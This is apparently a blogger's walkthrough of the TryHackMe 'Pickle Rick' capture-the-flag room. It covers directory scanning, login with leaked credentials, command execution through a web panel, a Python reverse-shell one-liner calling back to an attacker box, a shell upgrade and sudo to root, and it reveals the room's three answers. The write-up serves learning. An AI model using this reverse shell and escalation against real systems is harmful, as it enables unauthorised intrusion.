Try Hack Me | Pickle rick Day #2
Today's Date is April 19th, 2022.
I'm back at the PickleRick CTF Room in TryHackMe today. After a good day in the office, with a few hints from a friend, I'm back on track with a few potential leads.
As it turns out, the directory scanning tools I was using yesterday have some additional features I was unaware of; These features include an option for a second loop including any potential file extensions you may want to look for. In this case that means I was ONLY searching for directories yesterday, but not any files within said directories, or otherwise. Turns out searching for files inside directories is pretty important went it somes to reconaissance.
When using Gobuster there is an additional flag I could have been using, the -x (file extensions) flag. it can be used such as:
gobuster dir -u url.to.website -w path/to/wordlist -x ext,ext2,ext3,ext4 -t (threadcount)
this will check each word in the wordlist, such as 'portal' on it's own, as well as with each extension you specify. this means that a directory such as "portal" now gets the following checks: url/portal url/portal.ext url/portal.ext2 url/portal.ext3 url/portal.ext4
This was a missing piece in yesterday's puzzle.
After running this command:
gobuster dir -u PickleRickIP.p.thmlabs.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x jpg,jpeg,php,gif -t 10
we find a few sites...
portal.php login.php
Here we see a username and a login page. Before we try anything fancy, let's just try the username R1ckRul3s, with the password found in Robots.txt, Wubbalubbadubdub
looks like we got lucky. This gets us in, and we're able to see a myriad of options, most of which seem to be locked behind an admin level permissions of sorts.. the 'real' rick. fortunately we have an input panel... not sure what it does, but let's try stuff!
Back when I did the OWASP top 10 training room on TryHackMe, I learned about some XSS attacks. I am curious to know if anything like that works here...
tried to create a basic popup alert: , but to no avail.
Seems like no? But I haven't exhausted all options. I did this, but this is prone to not work, generally it needs to be masked as an onerror action to loading an image to not get blocked by basic WAFs.
anyways, I was inspecting the webpage, I was able to find a weird comment that looked like a base64 string, I could tell from the double == padding at the end, and characters that seemed like they were all in the 64 character set which is required of base64. (2^6 unique characters). Something strange happened though, when I tried to punch it into an online base64 decoder... it told me 'malformed input'! Took me a second to figure out what was going on, but I am nothing if not stubborn. I was sure I recognized something fishy going on, so I was persistent, and punched it into a program I built some time ago that would lets call it... 'naively' follow an algorithm to convert any modulo of 6 bits (base64 character set) to their 8 bit (256 bit (ascii) character set) equivilent... and when it was done, it still looked like base64. WHAT?
so I did it again... and again... and again... again!? again...
Eventually baking my way all the way down this list... Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==
to this: VmpGU1NtVkdTWGxTYkdScFUwWktjRlZyVmt0VE1WWnhVMjA1VG1KSGVIbFhhMXBoVlZaV1ZVMUVhejA= to this: VjFSSmVGSXlSbGRpU0ZKcFVrVktTMVZxU205TmJHeHlXa1phVVZWVU1Eaz0 to this: V1RJeFIyRldiSFJpUkVKS1VqSm9NbGxyWkZaUVVUMDk= to this: WTIxR2FWbHRiREJKUjJoMllrZFZQUT09 to this: Y21GaVltbDBJR2h2YkdVPQ== to this: cmFiYml0IGhvbGU= to this: rabbit hole
and that's exactly what it felt like I was doing... going way down a rabbit hole, just hoping to get lucky. Now I'm here and not sure what to do with the information other than to execute it as a command... nothing.
well, I SUPPOSE something I could try would be just to input an actual ubuntu command, since I know this box is running ubuntu (I discovered this, yesterday.)
'ls' ... I found a clue! (clue.txt), and (Sup3rS3cretPickl3Ingred.txt) perhaps this is the first ingredient. I'll cat this file to read it's contents from the command panel, next. hopefully other commands work just the same...
in fact, after I try this, perhaps I'll try launching a reverse shell just so I can work a little bit easier as this website from a netcat listener... anyways.
'cat Sup3rS3cretPickl3Ingred.txt'
fail! This command was disabled to make it more difficult for future rick (which I guess is me?!). so sad.
Maybe I can just open it like I did robots.txt earlier. success! I have discovered the first ingredient.
'https://PickleRickIP.p.thmlabs.com/Sup3rS3cretPickl3Ingred.txt' mr. meeseek hair
I wonder what's in clue.txt... The clue is to look around the file system for other ingredient!
as it would appear, used the 'pwd' command, I am currently in the /var/www/html directory. time to look around.
I seem to be unable to traverse directories, so I'll have to search from here. ls /home shows me there are two users, 'rick' and 'ubuntu'. In rick dir, there is a dir called 'second ingredients'
Alright, so I plugged away as best as I could using the command line baked into this website but honestly it was kind of brutal. I tried using netcat, but this device doesn't seem to have netcat installed. I ended up using a python3 script from revshell.com:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKBOX IP",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
to pop a reverse shell to my netcat listener which I had running on my machine using nc -lvnp 1337
time to upgrade this guy to a more stable shell. I can do this easily with a command I have used in the past.. because I already know www-data (the user I am now) can run python3, I can use this:
python3 -c 'import pty; pty.spawn("/bin/bash")'
to have a stable shell.
now, I can either look around and see what I can find, or i can attempt to escalate permissions. I'd like to do that first.
lets try sudo something just to see if I can....
sudo -l is a great one to try first. it'll show me what all my user can do
well, that worked.. didn't even ask for a password. I can do it all.
can I have root?
sudo bash
I can. :^)
I wonder what I can find now!
I'm not sure where to start, but what I can do it start from the top of the directory tree, and work my way down.. I know that second ingredients is in /home/rick/second ingredients, but I don't know what to do with that yet. I couldn't get to it earlier when I couldn't use 'cat' from the webportal, but maybe I can now.
I accidentallied on the 3rd ingredient. fleeb juice. it was just sitting in the home directory of root.
As it turns out, the second ingredient was as simple as 'cat "/home/rick/second ingredient"' 1 jerry tear I just couldn't use that command from the web ui.
I think my biggest takeaways from completing this CTF, are that I need to start doing the obvious things first. I probably could've saved an hour of pondering time had I just tried 'ls' in that command box in the first place, instead of thinking 'rick' would've had custom obfuscated commands somehow baked into his web front end.
Further to this, more experience with the tools I am using, as well as with whatever other tools might be out there will come in handy big time. I got lucky a few times (like with the python3 script just sort of working.. why would this server have python3 in the first place?), so some takeaways are definitely to become more comfortable enumerating, or perhaps have a sort of 'plan of attack' where I have a bunch of standard practices lined up either in my head or on paper, for 'things to do when x happens'.
anyways, That's the box!
